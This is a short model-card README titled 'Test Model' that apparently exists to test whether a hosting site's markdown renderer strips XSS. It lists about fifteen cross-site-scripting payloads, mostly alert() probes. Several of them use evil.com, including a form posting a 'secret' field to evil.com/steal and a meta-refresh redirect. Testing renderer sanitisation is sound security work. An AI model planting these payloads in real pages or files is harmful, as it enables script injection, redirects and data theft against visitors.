File size: 1,066 Bytes
01868a8

---
license: mit
---
# Test Model

## XSS Tests

### Image onerror
<img src=x onerror=alert(1)>

### Script tag
<script>alert(document.domain)</script>

### SVG onload
<svg onload=alert(1)>

### Markdown link with javascript
[Click me](javascript:alert(1))

### Data URI link
[Click](data:text/html,<script>alert(1)</script>)

### HTML entities
<img src=&quot;x&quot; onerror=&quot;alert(1)&quot;>

### Iframe
<iframe src=javascript:alert(1)>

### Object tag
<object data=javascript:alert(1)>

### Embed
<embed src=javascript:alert(1)>

### Base tag (could redirect relative URLs)
<base href=https://evil.com>

### Form action
<form action=https://evil.com/steal><input type=text name=secret><button>Submit</button></form>

### Meta refresh
<meta http-equiv=refresh content="0;url=https://evil.com">

### Markdown with HTML
<details><summary>Click to expand</summary><img src=x onerror=alert(1)></details>

### Style injection
<div style="background:url(javascript:alert(1))">test</div>

### Event handlers in attributes
<div onmouseover="alert(1)">hover me</div>